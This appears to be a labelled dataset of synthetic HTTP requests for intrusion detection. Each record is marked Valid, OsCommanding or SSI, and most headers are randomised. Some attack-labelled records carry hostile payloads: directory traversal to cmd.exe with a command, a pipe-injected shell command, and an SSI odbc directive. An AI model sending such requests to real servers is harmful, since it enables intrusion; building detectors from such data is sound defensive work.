Authorization: NTLM dGFlZnQzY3RpcmNpb3RwaXROZWUySDZhbG9taHdydGQ0dFJoNEc0aGUw
Range: -96950
Referer: /itaae/tLZeoteu/eada9tmc.fgf
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: sKRXuZ@Q http://www.iarxit.net
UA-CPU: x86
UA-Disp: 9830,719,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3581x504
Via: HTTP/6.8 148.81.3.22
Transfer-Encoding: identity
Upgrade: lahia/9.9, khro/5.9, cn6rl/8.9, Leuecl/0.7
Warning: 607 145.140.108.102 "1uaqkehhratt5eDyite" 
X-Forwarded-For: 78.119.180.100
X-Serial-Number: 983815591636299863
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 14189
Start - Id: 29402
class: Valid
GET /tDv/aoo2oie/uhQ/iGRt0Yk5RW/hfxd-XCwm57CTS@b/rIefd27/Osc7udueLcEEsOhaasic/sUEUF4gMOH.htm?1e=mhptfiebntedivessahlikep7&CfnnreplacebnzFqNs=3604&ohdeeUriabad2fG=0tnohedesnahceo&Aoosoiato=cw&qwatNmztntE=kexeczNtconnecteeiwkl3abgsound8ol&qYFcy-hWMopt=nECjnL HTTP/1.1
Host: 100.103.235.118
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 152.201.222.227
Cookie: ituieEreire=65260558;me=813654
Cookie2: $Version="51"
Date: Sun, 13 Jan 08 08:45:20 CET
ETag: W/"r@L8Li8GcYN1uefJ"
Expect: 100-continue
From: onTs@ajeeiGu.com
If-Modified-Since: Fri, 22 Jul 05 21:37:24 CET
If-Unmodified-Since: Sun, 06 Aug 06 03:46:12 UTC
If-Match: "Z0cy_sLHNeH6ZLUVm."
If-None-Match: *
If-Range: "aBfN1jM2WV-I0UrSl"
Max-Forwards: 898
MIME-Version: 3.4
Pragma: m=8i
Proxy-Authorization: NTLM b25lc2xsYUVLZXNzbGR0b21pZXJ5YTl3YWhvZWVzdHRiaXR5aHFyZ2Rpb2tiYXJ1
Authorization: Basic bnRjM2U6b2p3dA==
Range: 61375-,6799-
Referer: http://hinua.it/hepelwce/loiivsd/tnpdcc5O/xsmb1ah.jpeg
TE: deflate,trailers,chunked
Trailer: Range
User-Agent: Mozilla/2.3 (Machintosh; U; Mac OS X 8.9; ay-az; rv:8.3.6) Gecko/20431252
UA-CPU: MIPS
UA-Disp: 2709,267,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0011x3310
Via: HTTP/2.9 41.75.131.229
Transfer-Encoding: gzip
Upgrade: FmetTc/9.4, tDhhl/1.8, oiuvat/7.6
Warning: 637 216.250.224.103 "tew7rd" "Sat, 20 Sep 08 06:41:50 GMT"
X-Forwarded-For: 2.168.186.132
X-Serial-Number: 55211271758
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 29402
Start - Id: 13380
class: Valid
GET /location8zDl.U-Phome9http4Wa/in40olbAqeea/cwENV1Vouv/4t1vKq/cednetoea1pqhTx1o2ij/xmlV1n.htm?joer9alxbt=+%24nd&leeB5teoqhm9=20138&ZG5JQ1U=shs&rh=19491061 HTTP/1.1
Host: 147.212.175.233:80
Connection: close
Accept: image/gif
Accept-Charset: euc-tw, x-mac-chinesetrad, ks_c_5601-1987, isiri-3342;q=0.6
Accept-Encoding: *
Accept-Language: fevlsuw2-skgEl;q=0.1, 8jfdove-tyEq9td, le8sca1n-oe;q=0.7
Cache-Control: min-fresh=37
Client-ip: 88.65.120.166
Cookie: 0TkJJT-enY1s=2457185;htoenrgcs1Sv=642647961
Cookie2: $Version="49"
Date: Sun, 02 Apr 06 19:20:53 GMT
ETag: W/"YHWB-pSd1IKDDMSDMhX"
Expect: nsnth
From: 4butpT@e0niqeT8.uk
If-Modified-Since: Wed, 28 Feb 07 21:47:35 GMT
If-Unmodified-Since: Mon, 12 Apr 04 09:32:25 CET
If-Match: *
If-None-Match: "q4@WSSy-hxwN4ff"
If-Range: Thu, 02 Apr 09 07:02:54 GMT
Max-Forwards: 07
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cost eNin=l2ee4li
Authorization: Basic ZWVzbnZsZG46bmlsZA==
Range: 30-,-79267,97-361160
Referer: /5rna28qn/ehwfced/1dna.exe
TE: chunked,gzip;q=0.2
Trailer: Warning
User-Agent: eipe5TS/7.6.5.3.1
UA-CPU: x86
UA-Disp: 6806,3540,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8753x0793
Via: 1.3 www.Ttegn.jpeg, HTTP/4.1 www.sehi2ils.jpg, HTTP/6.5 www.umrzlal.tiff
Transfer-Encoding: Teaut; ulel8r=aytmLeao
Upgrade: tNatdt/7.8, 7ear/6.7, nTyilu/3.1, oyem/6.0
Warning: 179 www.bavgex.js "ahhenfcehln" 
X-Forwarded-For: 235.128.16.55
X-Serial-Number: 0029155789665263
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13380
Start - Id: 18257
class: Valid
GET /yVKZOpcWM9l/sXF9eSGcg-86A/sd7aC/EDI@V0d2/tPbTS4pkgfMkme/etSg/elQ/cEhvbid/Kks/t5pyVJSegr3FOsZLeYvK/jloeehed2gez.html?m7e6=eg5eond&ait9enaa=vncLX_x0isE%40&tUtiglploisw=ti+vtc&woo=hO8516dL&uerrefsep3ds=9&ideeeCyehus4Nr=lYe&5iIlgmh1d=11063&tranOph6wzs=tahudoscript&oana=hnoorcteaderEs%3D0logf HTTP/1.1
Host: 170.247.102.249
Connection: keep-alive
Accept: text/*;q=0.8
Accept-Charset: windows-1252;q=0.7, big5, x-mac-korean, macintosh;q=0.1
Accept-Encoding: gzip;q=0.9, gzip;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 31.73.93.232
Cookie: evalgstyleK=eouuoitt
Cookie2: $Version="777"
Date: Fri, 12 Jan 07 12:26:31 CET
ETag: "qBXzJyw3LgGQZ0kD"
Expect: 100-continue
From: anwits@qdrec.org
If-Modified-Since: Sat, 29 Aug 09 03:34:54 GMT
If-Unmodified-Since: Sat, 22 Mar 08 07:45:14 UTC
If-Match: "wqsrjc9gOWrK2ZTHgmS"
If-None-Match: *
If-Range: "OiTgtkg0FBGoZpaj"
Max-Forwards: 3
MIME-Version: 9.9
Pragma: jfnet1kp=zSahix5
Proxy-Authorization: tOws weren2rT=4eqgot
Authorization: NTLM aW5rZXJ4bGRkeTNkbGhkc290bmVnbGc5Z2dtY3llZHNnZXdpdA==
Range: -043,7-,317257-
Referer: /Td0e.avi
TE: chunked;q=0.4,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: o6qoaede9 (dMaoJX5p; euBU@.WT; sw4zEM3j5O; 6_pUyR6_)
UA-CPU: Sparc
UA-Disp: 9840,221,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1021x3555
Via: FTP/6.7 www.lftta.png
Transfer-Encoding: gzip
Upgrade: oeEul/3.4, B6ened/3.9, oRoC/0.7
Warning: 014 249.54.239.43 "agN4e4iw1ae5s" 
X-Forwarded-For: 45.41.138.217
X-Serial-Number: 561642112
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18257
Start - Id: 6458
class: Valid
POST /rK6bdUhY/fHemwH9TJitd_4S/oD6O_s26/wi6cgc5esgt/J@8/div_WT/h9htuochoNzWh8TAO1/sv4ceinhByMV/enqHZ-vYZ.96a/22Vb.tMx4s6ii4c5/documentNPWYdWI.gif? HTTP/1.0
Content-Length: 289
Content-Language: ytWnh3oe,erswynre
Content-Encoding: gzip
Content-Location: /tehnuno.nsf
Content-MD5: ZG9lNnJrZXR1cXhkU3Nhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 Feb 04 07:19:48 GMT
Last-Modified: Wed, 06 Jun 07 07:44:09 GMT
Host: 101.70.165.235
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 252.165.233.246
Cookie: 4tT=g5@Iy;iIuHry=qmfEdNlSotvwoe
Cookie2: $Version="601"
Date: Sat, 03 May 08 07:19:01 CET
ETag: W/"osg4RNIN@Cc.nMt6S7"
Expect: meta
From: aVFabc@O7fpolootx.be
If-Modified-Since: Fri, 09 Dec 05 13:34:15 GMT
If-Unmodified-Since: Mon, 21 Apr 08 09:55:22 GMT
If-Match: *
If-None-Match: "t3vQ9Xc@NK@Oy2x"
If-Range: Tue, 14 Mar 06 13:04:21 CET
Max-Forwards: 6600
MIME-Version: 3.4
Pragma: rvId8tfa=iwuzauS
Proxy-Authorization: Basic bmxpZW1lZTpFeWFhYQ==
Authorization: Digest uri=http://ewwl.org/aacu.php
Range: 35260-775435,47-,92-626366
Referer: http://eapreec.fr/wiema/Lent/atscmo.exe
TE: trailers,chunked;q=0.6,trailers
Trailer: From
User-Agent: heqNeei/0.1.9.7
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7911x302
Via: 3.3 www.TeEj.js, ighnan/2.4 26.133.66.23
Transfer-Encoding: compress
Upgrade: oaj/7.3, Q8eooh/4.3, ea2kra/3.3, aegr/6.3
Warning: 447 37.2.170.213 "8reqteinidDfS9tu7r6" "Mon, 13 Mar 06 18:40:21 UTC"
X-Forwarded-For: 218.75.218.198
X-Serial-Number: 003791
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

rsvaFl=fcwhere&ztEbgsoundDGZUtelnet=aHHn2q09&onSode=4317800&doyiebiafwthn=Ettwa&tdeoe0iee=c9\I:/lokhrj)whereeM&8ganstn73=d0Jlu-p&efuraw=980&slzee4ierdu=yohglxipltlg&Roeeeo3niujncrv=myD_9&alyczzc1sw=94216000&jn9ot0nh=wMq97&ltd=81387384&hsTntmobcmeof=wEnih&vet=0rmhdc<t&lmide=06689

End - Id: 6458
Start - Id: 44286
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: 86.219.199.199
Connection: aetra
Accept: */*;q=0.9
Accept-Charset: windows-1252, x-mac-japanese
Accept-Encoding: 
Accept-Language: dt-r1nnfenm;q=0.7, erdr-tenie;q=0.8, uth-ylnua;q=0.2
Cache-Control: no-store
Client-ip: 136.184.250.5
Cookie: lEo2Ine7=rasc4;iylppgkepw=025898290;6sTiytjbonbre=4Jo9I0TJf5M;ilineertihRf=808888
Cookie2: $Version="75"
Date: Mon, 20 Aug 07 15:28:21 UTC
ETag: W/"Qb2QB@VsQ3Re-5VyzA"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Thu, 18 Nov 04 19:40:33 UTC
If-Unmodified-Since: Thu, 16 Sep 04 21:53:31 CET
If-Match: *
If-None-Match: "sXzhETLzaX4W4CVxSK1S"
If-Range: Mon, 08 Nov 04 16:50:31 UTC
Max-Forwards: 999
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: vahee otnsenso=4Odndyfc
Authorization: Basic dG5hdkRsQjppZVNpdGF1TA==
Range: 77-00,194-
Referer: http://www.5ncnXtTy.be/lthf/evtmy.bin
TE: chunked,chunked;q=0.4,trailers
Trailer: Via
User-Agent: Mozilla/1.6 (X11; U; Linux i586 5.3; rF-oT; rv:4.9.8) Gecko/59020691
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 902x0631
Via: FTP/3.8 www.4iden.png:946, 4.5 www.mie3.tiff, jlawrd/1.2 www.a0eefe.css:9260
Transfer-Encoding: compress
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 76527711
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44286
Start - Id: 35013
class: SSI
GET /pbInd2a8rssb/egq/z5_1@B7Md3/oahuotac2guuGiz4dc/oSNAtN_PNdxHQrzMAG/88qs8alv.cfm?kZeiV8s=y.pkYpAkF&ccnab8=tryf9&nepeaefnarsts7=ip&sne=ftpscriptnetcatteoj%28+fehgheoshutdowncand&7ym2kwrrc=6&SyLE4elpwf=R9gfs5oel3o&siqmetaWuyY=ssnq2h&oty7scIjortbe=03785402&dUNB7=%3C%21--%23odbc+++++statement%3D+%22select++++7C0ut%2C++ctnnEe%2C+egsou+++++from+++afeTgnrne++++order++++by+++0%2C++++549%2C+++9%22+++--%3E&7r=zHjlhmh HTTP/1.1
Host: 114.149.1.183
Connection: keep-alive
Accept: application/x-tar;q=0.9, video/*, application/*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 4.200.130.247
Cookie2: $Version="03"
Date: Tue, 28 Apr 09 19:55:07 UTC
ETag: W/"0youiSpW_y41JK@H"
Expect: 100-continue
If-Modified-Since: Mon, 16 Nov 09 06:52:58 UTC
If-Unmodified-Since: Mon, 08 Mar 04 15:54:56 GMT
If-Match: *
If-None-Match: "EpxhN-4iy1uzbvI"
If-Range: *
Max-Forwards: 60
MIME-Version: 0.3
Authorization: Eyneio 0aliuV1l=lsdp
Range: 4978-84,830195-719467,3968-5663
Referer: http://thdn.org/aoei9/Thna/apuuti.mpeg
TE: trailers
Trailer: Authorization
User-Agent: enolxhlsx
Via: 9.8 40.97.137.62
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35013
Start - Id: 36566
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.r9fxreGdi.de
Connection: ntqcma
Accept: text/xml;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: tvvewn='3exEttok'
Client-ip: 117.70.6.179
Cookie: aSenirKs4ioaeeg=682;dRjv=4eeee'lLihavingl;DrwBvzGpe@iobject=c$b;ni=a;EIqoys8ga=Sxthtaebzealllhdki;heTdx= srrposition9Hdwp-etlikeNeniw
Cookie2: $Version="655"
Date: Fri, 19 Dec 08 04:39:46 GMT
ETag: "._sHr99T4AKY.QbUteoU"
Expect: e2h0
From: osNAoh@aHn2nry.de
If-Modified-Since: Mon, 17 Sep 07 02:32:52 GMT
If-Unmodified-Since: Fri, 17 Oct 08 02:22:47 CET
If-Match: "f82VsZpd.HZDE.qc"
If-None-Match: *
If-Range: Wed, 06 Apr 05 08:40:52 GMT
Max-Forwards: 3
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: 4eitC tieta=unrJ6ewe
Authorization: NTLM bmdpdWx0bGdlZ3R3bzlzc0Vsb2Vhd3E0dXNvZ3dpdWhvZ2F1b3hlYnBTdmk0aTU=
Range: -961935,910376-
Referer: /3cuwin/kHeh3/ooNyoen.mdb
TE: deflate
Trailer: If-Match
User-Agent: Mozilla/3.7 (X11; U; Unix 3.2; te-le; rv:9.6.0) Gecko/29272311
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 547x5195
Via: HTTP/2.9 186.100.131.110
Transfer-Encoding: deflate
Upgrade: iOe8/3.1
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36566
Start - Id: 18778
class: Valid
GET /I35/ocrn/tqoYleveshibmcKe/n7@dI1t/sJJ@IR5kjpCN4ZKGs-/Stjtohowtuzt/v1fnd3eatibaiTzanE9i.sh? HTTP/1.1
Host: 60.121.230.197
Connection: close
Accept: text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nbuu7-apd6xrme, hd-o, W53bdtIt-dtaeab;q=0.7, k3oEtT-nct, ed5-seeab;q=0.5
Cache-Control: 2Imu3aaa='g'
Client-ip: 83.62.14.82
Cookie: hT1=dlepdtr0EGern;Pieoodtonese=055314;n3f9r9eObepdaoe=lNBu
Cookie2: $Version="842"
Date: Sun, 09 Apr 06 22:34:37 GMT
ETag: "F4pahYczbUumgOsX-cl1"
Expect: DrnnfC=othwa
From: 9Hmsl7@qEiue.biz
If-Modified-Since: Mon, 13 Oct 08 01:18:04 GMT
If-Unmodified-Since: Tue, 17 May 05 20:52:07 CET
If-Match: "0VSs4696vGC0wFmetrS"
If-None-Match: "5EL@Zc9czAknISbH32FQ"
If-Range: Mon, 09 Jun 08 11:32:47 GMT
Max-Forwards: 5
MIME-Version: 6.5
Pragma: e='wo'
Proxy-Authorization: Digest uri=/1r5fAsr/ectssf/toia.doc
Authorization: Basic M2FkRXI6T3NpZ3Rxbw==
Range: 1460-
Referer: http://www.Aeoli.net/ctra/6tnoEfd/reieh.png
TE: deflate;q=0.3,trailers,chunked
Trailer: Host
User-Agent: Mozilla/6.0 (Windows; U; Win98 9.6; di-hs; rv:4.4.0) Gecko/12968282
UA-CPU: Sparc
UA-Disp: 0379,370,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6403x795
Via: HceNW/1.7 98.136.142.160
Transfer-Encoding: compress
Upgrade: scjua/4.0, O6ncj/2.1, voL8r/4.5, etq/4.7
Warning: 895 www.ef4ioNd.js "fj9cdOInrh" 
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18778
Start - Id: 28286
class: Valid
GET /Isaj/o6atLQT/esvaF@S@S5rBEBv3/i@T2gPojQ/bKPNL/rhKT8POws83kZ-USaAC./cfHxExN5xtz48r/JQtIrlikewHmRi/sosaoiqis/iGwil7qWBI3hdGVB17i.tiff?0toHfsaogeraFhh=shxsslformqnuFr HTTP/1.0
Host: www.ifoe5l.uk:0
Connection: close
Accept: */*
Accept-Charset: utf-8, isiri-3342, x-mac-cyrillic;q=0.5, isiri-3342
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: spxLoia='G'
Client-ip: 79.12.235.104
Cookie: Laa=619096;PPRtsaccept=bh;h6oiIPle=tSgMZ77gB9A;Tzln0tc8=hfZPZaIA
Cookie2: $Version="767"
Date: Wed, 23 Jun 04 08:20:30 CET
ETag: W/"moBM6HqWWLQWKdG9k"
Expect: 100-continue
From: sgoetH@t0deA.net
If-Modified-Since: Wed, 17 Mar 04 19:15:51 GMT
If-Unmodified-Since: Fri, 29 Dec 06 06:01:41 CET
If-Match: *
If-None-Match: "E2EZxU86bDYz.Gj"
If-Range: Wed, 23 Jan 08 04:19:53 UTC
Max-Forwards: 3
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: olaif WunoaCa=aerw
Authorization: Digest uri=/hhxnpi/vheans.mspx
Range: 891578-234881,-4488,045218-
Referer: /n5o1eta/ipibo/aeIe.rar
TE: trailers,trailers,gzip;q=0.9
Trailer: Accept-Charset
User-Agent: Mozilla/5.1 (compatible; Konqueror/0.4; Windows NT; dekElpokl; rerathcA1e; ttwtiidtd)
UA-CPU: Sparc
UA-Disp: 5435,696,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7134x450
Via: 0.3 73.193.123.158
Transfer-Encoding: nsoeti; Nsdatl=e98a
Upgrade: iaRtso/6.7, aakyo/7.1, oash/9.5, mwdp/3.3
Warning: 207 www.iRadateo.png "Hkr6Ecnpnearvdrttm" "Thu, 13 Aug 09 17:46:46 CET"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 3984354
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28286
Start - Id: 18439
class: Valid
GET /vO5jrFTh7YesOGsmY/o3hgThHHu8po/tlskuw1khiOwv/huEu7/dhZjAcMSM7_.B7X/lH5ix@9RyBbs7Y8KdJZ/FTJ-.gif? HTTP/1.0
Host: www.neibddme1.net
Connection: keep-alive
Accept: application/rtf;q=0.5, audio/x-wav;q=0.9, video/*;q=0.3
Accept-Charset: x-mac-chinesesimp, iso-2022-kr, iso-8859-3;q=0.8, iso-8859-1;q=0.1
Accept-Encoding: deflate, deflate;q=0.4
Accept-Language: euFtI-Wqu
Cache-Control: Rr5h=l
Client-ip: 149.80.222.251
Cookie: rtsAh8ittn=680736;teiakiirO4hSon=a;qJfromAn0a0g=)htwindow.openoeehi;rhxnel6s=6796;1a=eoI;Uy=382
Cookie2: $Version="71"
Date: Sun, 22 Oct 06 19:57:37 GMT
ETag: "v-EN3eDfceKAwK7tP"
Expect: 100-continue
From: sen0esya@3Yt7.ch
If-Modified-Since: Wed, 28 May 08 08:42:10 GMT
If-Unmodified-Since: Mon, 21 Jun 04 05:44:11 GMT
If-Match: "_x9jpy4OrzMm.8V-pEQg"
If-None-Match: "pJgRzonv@tnRh7NtM0"
If-Range: Wed, 29 Aug 07 10:12:14 CET
Max-Forwards: 719
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest response="cf0fe3fcd29943F7e8174dABacCA029E"
Authorization: ciwles sbernhnu=Hohe3
Range: -149,-10
Referer: http://www.r41x.com/deto/sslw/owjtb/Widf5i.pl
TE: trailers,deflate,chunked;q=0.6
Trailer: Cache-Control
User-Agent: Mozilla/1.5 (Windows; U; Windows NT 2.0; rt-e3; rv:2.6.7) Gecko/14834726
UA-CPU: PowerPC
UA-Disp: 3029,548,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 564x888
Via: FTP/5.6 www.jz4Ohr.jpeg
Transfer-Encoding: identity
Upgrade: er0ua/3.6
Warning: 665 248.249.212.194 "llab" 
X-Forwarded-For: 94.17.82.121
X-Serial-Number: 562102259881666351
----: -------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 18439
Start - Id: 31672
class: Valid
GET /ioouef/50Umei7nudsd/pbtsnsn4t7asimnhonm/eZ/ec3ewooyi2nCdd4tmo/yFaTufwevAL/rfXozj5Ze/jAMflAb2blCvlqvq/wtcBwS/s5nm/iHpr6eefaoDi/S3LH..html?khqe=067 HTTP/1.0
Host: 53.244.14.150
Connection: sehuae
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 172.97.250.206
Cookie: frSnn9dei= qe;ansKltthw8=9853781;uep=l txml;o06yox9shnOtLt=Mothsrue;vie9g3=exOkmQBpxRLH
Cookie2: $Version="771"
Date: Sat, 15 Mar 08 09:48:18 CET
ETag: W/"yj3Ke_Th9ugnelKLp"
Expect: crmes
From: tnalwxn@id6aAl.gov
If-Modified-Since: Tue, 30 Mar 04 18:47:18 UTC
If-Unmodified-Since: Mon, 31 Jul 06 22:47:22 UTC
If-Match: "1RMIsydyY51HKe1pk"
If-None-Match: *
If-Range: Tue, 05 Jan 10 12:09:44 GMT
Max-Forwards: 113
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic b2R0ZWlkcTp6ZWloVXI=
Authorization: NTLM aDB0UmEzOHJycmF3ZXhwY211bERyb2JOaGVCbWVyMGwwYWRlb2tPZWUx
Range: 9679-65969
Referer: http://etlts4nS.de/5dtsvr.exe
TE: trailers
Trailer: Date
User-Agent: haef9grhv (eXfvzSd4X)
UA-CPU: MIPS
UA-Disp: 4044,795,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7206x4658
Via: FTP/9.5 www.n3trqne.css
Transfer-Encoding: deflate
Upgrade: btunt/5.4, cYrmc9/5.3, hcAhe/8.8
Warning: 071 www.j3eiA.html "EeaengpaRo" "Wed, 16 Feb 05 06:28:35 UTC"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 049800080
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 31672
Start - Id: 17623
class: Valid
GET /7SUnr-.sh?xsnwOft=9ii0aoDlae%2B+e&aJAxterm=Sudlmsw4s&45=6vjqyYlF&OiHltZm=d8+ewe5ee&tewgotaeaEoli=c3z%3Eexec&mfsm=6843784&ndmvr1lfsdPmtUq=+ln23ecx2h+tad&ei=tihz&7aAIteTem0ev2fp=trP&pterotnbeqf=lh HTTP/1.0
Host: www.erxeemoo.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: DhliSt-jzstibi;q=0.1, l4-sc9asi;q=0.5, mdtta-sn5n, leib8-paiqa
Cache-Control: max-stale
Client-ip: 126.245.52.118
Cookie: esnepsei00d2a=o=oej;rcphOb7aenuhr0D=loehtpassashrqst>t;r7tniAgosy9d=pAa3oEbe;Cthrjhxoitdx=tU0FG
Cookie2: $Version="35"
Date: Fri, 12 Sep 08 20:39:41 CET
ETag: "coqizgjWgRcRJ8DU7M"
Expect: 100-continue
From: oTii@htOg.it
If-Modified-Since: Tue, 28 Dec 04 12:55:35 UTC
If-Unmodified-Since: Thu, 14 Jul 05 12:57:26 CET
If-Match: *
If-None-Match: "JAwT904ATXYpdnMz0"
If-Range: *
Max-Forwards: 6064
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/ote8cdid.gif
Authorization: NTLM R2phWXhyRnROdHQ2ZW5zaGRvb2NlZWFlcmUzY3pTYWFSNDJhdGRlYWF1b29pcnQ=
Range: -948
Referer: http://www.su8et.com/meOo/nfmtjnd.html
TE: trailers,trailers,chunked
Trailer: TE
User-Agent: Mozilla/5.9 (X11; U; Linux i386 5.8; ue-sh; rv:1.0.5) Gecko/54901052
UA-CPU: MIPS
UA-Disp: 611,8955,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 519x8664
Via: 2.2 63.50.93.56, 5.2 3.89.79.190
Transfer-Encoding: gzip
Upgrade: rIei/5.8, lso/4.1, dulnn/5.1, ewh/7.0
Warning: 712 223.93.147.43 "mgu5s9ciwimaaiteyot" 
X-Forwarded-For: 68.35.229.1
X-Serial-Number: 9137619285
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17623
Start - Id: 26211
class: Valid
GET /roe7ntrdoll/4Bb3at37l8rL/eAAn43.J.yHsJLHHy/qneY.asp?nene2dttUk7lh=vhlenaknRefoaed2&esgogIeeoipr=6selv&trimgyBprocessing-instructionB_8kER=7653954&qA1l=d2L0&necosbcelrntaov=gO97afIo4&e7lnoexryu0yd=lrdi&bGefm=15414147&luG=lalah&eUr4eto2Reit0n=ftUfaoptuo&a7t4=f4kAy6pH%407&GgMeAAE3m=6623975&EWw.wkf=oa%28%400nrnyemqrUc&meeslnrzil0ba1J=cbhihhfsed2as7zdoe HTTP/1.0
Host: www.ey6h.de
Connection: hlmts
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: sta0isn-a;q=0.3, scU8w-a4h1cpor, y-p1r;q=0.7
Cache-Control: max-age=50724
Client-ip: 26.216.82.101
Cookie: 3PJ.oWYblogobjecti7=efz;l7rain5bs=nlunxY;LaInnnEe=6214;ctoean7ezoeft=7132612;a0mdatibae1nB4=8AZ.xSipK@PC;tk=sa_HkuZ@
Cookie2: $Version="29"
Date: Thu, 01 May 08 18:49:07 UTC
ETag: W/"rFsl@N.AdapEJzmyc4"
Expect: waeucNpB
From: ts1wUaS@wxeiemthe.st
If-Modified-Since: Fri, 14 Aug 09 02:07:22 UTC
If-Unmodified-Since: Sat, 26 Jan 08 22:28:01 GMT
If-Match: "u0VGMfFep54JiDg2Av"
If-None-Match: "HAlo7rawVTP.uMvEe"
If-Range: Sun, 23 Aug 09 09:07:37 GMT
Max-Forwards: 2
MIME-Version: 2.8
Pragma: teg='eyaa8'
Proxy-Authorization: NTLM Z2NlSWx1YW1zaGQweGllY2UzYmNxeWlXc3hubTZucml0WnRUeWltZQ==
Authorization: eataui apuF=l9oXm
Range: 485874-76550,627253-,688763-0608
Referer: /vOtT/ada4ie/1IIe/cMor/i6tf.wav
TE: chunked;q=0.5
Trailer: If-None-Match
User-Agent: Mozilla/7.5 (Windows; U; Win98 7.1; 06-8o; rv:5.7.4) Gecko/16988735
UA-CPU: PowerPC
UA-Disp: 1270,703,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 733x086
Via: 5.3 www.Oaaot.gif
Transfer-Encoding: deflate
Upgrade: fR2SsR/5.3, 3lie4s/1.4, jotr/3.5, kw3/5.8, eyeh/6.5
Warning: 403 www.1ernaeea.tiff "sB1ntt" "Thu, 29 Jan 04 19:12:54 UTC"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 2106773576
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26211
Start - Id: 6956
class: Valid
PUT /obMllplS1dzh6nahpr/AOMU.eZRW/bPz_c9s5PV/eoe/WsunetcatWinRW/bU@Qs4Q/n9gDcHnxD/to.shtml? HTTP/1.1
Content-Length: 148
Content-Language: 9lmrae
Content-Encoding: gzip
Content-Location: http://hx3bk.org/Taohibr/Miahrni/6tzeri/teeto.js
Content-MD5: ZW93bDg3bzdtZW8wVGRldg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Aug 06 24:33:31 GMT
Last-Modified: Sat, 14 Apr 07 08:03:58 CET
Host: www.ootuNiTS.st
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.7, identity;q=0.8, identity;q=0.9
